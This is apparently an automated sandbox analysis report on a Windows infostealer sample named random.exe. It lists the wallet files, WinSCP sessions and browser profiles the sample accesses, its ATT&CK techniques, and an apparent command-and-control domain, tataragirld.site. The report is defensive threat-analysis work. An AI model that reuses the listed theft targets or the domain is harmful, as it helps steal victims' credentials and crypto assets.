Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: XC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831% source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1h2txyewy\LocalStan source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statek source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067746341.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067449327.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbNL source: random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb/L m source: random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: APP169~1.LOGntkrnlmp.pdb5x, source: random.exe, 00000000.00000003.2344673677.000001D2E6CA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2z source: random.exe, 00000000.00000003.2068086727.000001D2E6C3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdby}Yn source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\Local Statel\Pac source: random.exe, 00000000.00000003.2067164908.000001D2E6C66000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb}}]n source: random.exe, 00000000.00000003.2123211953.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067840965.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2067343325.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2118510642.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2068013384.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2069197322.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BROWSE~1.PDBBrowserMetricsdb source: random.exe, 00000000.00000003.2067117718.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp
Source: random.exeStatic PE information: real checksum: 0x28868a should be: 0x285c88
Source: random.exeStatic PE information: section name: .xdata
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 7964Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 7964Thread sleep time: -30000s >= -30000sJump to behavior
Source: random.exe, 00000000.00000003.2027524600.000001D2E5248000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2010328189.000001D2E5248000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2011205859.000001D2E5248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: random.exe, 00000000.00000003.2219835003.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\random.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonlyJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Users\user\Desktop\random.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

barindex
Source: random.exe, 00000000.00000003.2036659343.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
Source: random.exe, 00000000.00000003.2301128582.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-md5:8JaxXsv3FdlLPFd3JRetAg==
Source: random.exe, 00000000.00000003.2036659343.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wallets\Exodus\exodus.wallet
Source: random.exe, 00000000.00000003.2036659343.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wallets\Exodus\exodus.wallet
Source: random.exe, 00000000.00000003.2027869368.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: r\??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 OverrideJump to behavior
Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
Source: C:\Users\user\Desktop\random.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
Source: C:\Users\user\Desktop\random.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
1
OS Credential Dumping
1
Security Software Discovery
Remote Services21
Data from Local System
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
Registry Run Keys / Startup Folder
1
Virtualization/Sandbox Evasion
1
Credentials in Registry
1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager1
Process Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets13
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583965 Sample: random.exe Startdate: 03/01/2025 Architecture: WINDOWS Score: 76 39 tataragirld.site 2->39 53 Multi AV Scanner detection for submitted file 2->53 55 AI detected suspicious sample 2->55 8 random.exe 2->8         started        12 msedge.exe 61 690 2->12         started        14 msedge.exe 2->14         started        16 msedge.exe 2->16         started        signatures3 process4 dnsIp5 47 tataragirld.site 188.114.96.3, 443, 49737, 49738 CLOUDFLARENETUS European Union 8->47 57 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->57 59 Found many strings related to Crypto-Wallets (likely being stolen) 8->59 61 Found strings related to Crypto-Mining 8->61 65 2 other signatures 8->65 18 msedge.exe 16 8->18         started        49 192.168.2.4, 138, 443, 49590 unknown unknown 12->49 51 239.255.255.250 unknown Reserved 12->51 63 Maps a DLL or memory area into another process 12->63 20 msedge.exe 12->20         started        23 msedge.exe 12->23         started        25 msedge.exe 12->25         started        33 2 other processes 12->33 27 msedge.exe 14->27         started        29 msedge.exe 14->29         started        35 2 other processes 14->35 31 msedge.exe 16->31         started        signatures6 process7 dnsIp8 37 msedge.exe 18->37         started        41 104.46.162.224, 443, 49798, 49821 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->41 43 20.110.205.119, 443, 49809 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->43 45 17 other IPs or domains 20->45 process9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
random.exe29%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://tataragirld.site/sagesse_renaldo0%Avira URL Cloudsafe
https://ntp.msn.comsec-fetch-sitesame-sitesec-fetch-modecorssec-fetch-destemptyrefererhttps://ntp.ms0%Avira URL Cloudsafe
https://ntp.msn.comAccess-Control-Allow-Credentials:0%Avira URL Cloudsafe
https://msn.om0%Avira URL Cloudsafe
https://tataragirld.site/sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3D0%Avira URL Cloudsafe
https://tataragirld.site/sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz0%Avira URL Cloudsafe
https://www.nic.cz/odvr/har0%Avira URL Cloudsafe
https://ntp.msn.comx0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
chrome.cloudflare-dns.com
162.159.61.3
truefalse
    high
    sb.scorecardresearch.com
    13.32.110.104
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        tataragirld.site
        188.114.96.3
        truefalse
          unknown
          googlehosted.l.googleusercontent.com
          172.217.16.193
          truefalse
            high
            clients2.googleusercontent.com
            unknown
            unknownfalse
              high
              bzib.nelreports.net
              unknown
              unknownfalse
                high
                assets.msn.com
                unknown
                unknownfalse
                  high
                  c.msn.com
                  unknown
                  unknownfalse
                    high
                    ntp.msn.com
                    unknown
                    unknownfalse
                      high
                      api.msn.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://tataragirld.site/sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz1GfiNddrJjYjNZ3%2FJd4bCLu7irk2mkj7p6jPYK0UCnJWx5ekJ7g%3D%3Dfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://c.msn.com/c.gif?rnd=1735943564647&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5a52ed0c294f4f41b8f4e067b1be6fff&activityId=5a52ed0c294f4f41b8f4e067b1be6fff&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=168B4F4B4C3749C99CB580CDBEB608F0&MUID=035D89D9374366AE1C219CB0365A672Afalse
                          high
                          https://sb.scorecardresearch.com/b?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=035D89D9374366AE1C219CB0365A672A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.msn.com/auth/cookie/silentpassportrandom.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtabrandom.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/ac/?q=random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://tataragirld.site/sagesse_renaldorandom.exe, 00000000.00000003.2027524600.000001D2E5230000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2011205859.000001D2E5237000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2019279215.000001D2E5230000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://c.msn.com/c.gif?rnd=1735943564647&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&trandom.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://dns.sb/privacy/Charrandom.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://assets.msn.com/bundles/v1/edgeChromium/latest/common-feed-libs.ff0b115aac18a3a45015.jsL_random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.d639c3da7a2212403887.js=APP_ANON&srandom.exe, 00000000.00000003.2257822518.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.4ca3042d6ee42614004f.js47random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285168426.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://public.dns.iij.jp/random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/nas-highlight-v1.fb4298238a214987dc13.jsa51bb7random.exe, 00000000.00000003.2220367398.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://deff.nelreports.net/api/report?cat=msnrandom.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=Edge-Prod-EWR31r5d&FrontEnd=AFDrandom.exe, 00000000.00000003.2271181171.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://r.msftstatic.com/nTrandom.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://assets.msn.com/staticsb/statics/latest/icons/office-icons/PowerBI_24x.svgrandom.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2297962610.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://deff.nelreports.net/api/reportrandom.exe, 00000000.00000003.2185683186.000001D2EAA77000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257822518.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2151510942.000001D2EAA83000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2219726288.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240216428.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241586027.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241455616.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2186276781.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://assets.msn.com/staticsb/statics/latest/icons/office-icons/OneDrive_24x.svgrandom.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ntp.msn.comsec-fetch-sitesame-sitesec-fetch-modecorssec-fetch-destemptyrefererhttps://ntp.msrandom.exe, 00000000.00000003.2286126023.000001D2E6C5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Sway_24x.svg.0.2045.47random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://doh.cox.net/dns-queryrandom.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://dns11.quad9.net/dns-queryrandom.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Teams_24x.svgrandom.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2300170922.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_topics-shared-state_dist_TopicData_connecrandom.exe, 00000000.00000003.2221845562.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/random.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://assets.msn.com/staticsb/statics/latest/icons/office-icons/Sway_24x.svgrandom.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.msn.comrandom.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://assets.msn.com/bundles/v1/edgeChromium/latest/weather-card-data-connector.344fb2a09f131a3e03random.exe, 00000000.00000003.2299852896.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240827017.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257130441.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285552932.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://e5.o.lencr.org0random.exe, 00000000.00000003.2254806673.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2189549133.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2189906585.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257548362.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2346037519.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2240216428.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2347582659.000001D2EAA65000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2301004825.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241455616.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2283736711.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://assets.msn.com/bundles/v1/edgeChromium/latest/SignInData.738774a1565695022644.js1876.jsrandom.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://assets.msn.com/bundles/v1/edgeChromium/latest/common-settings-edgenext.2aca53164d1cd4b72160.random.exe, 00000000.00000003.2206340171.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_location-service_dist_AutoSuggestService_random.exe, 00000000.00000003.2221845562.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://ent-api.msn.com/%22random.exe, 00000000.00000003.2149378613.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2168129632.000001D2E6CBA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2203901916.000001D2E6CC5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241182300.000001D2E6CB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=trandom.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://msn.omrandom.exe, 00000000.00000003.2272417273.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2241273660.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://ntp.msn.com/edge/ntp?locale=en-GB&title=Newrandom.exe, 00000000.00000003.2220708790.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://nextdns.io/privacyrandom.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-control-wc.367cab6cb9bb41af1876.jsrandom.exe, 00000000.00000003.2269944816.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2298731684.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://img.s-msn.com/tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=tLast-Modified:random.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://bzib.nelreports.net/api/report?cat=bingbusinessurandom.exe, 00000000.00000003.2206209727.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
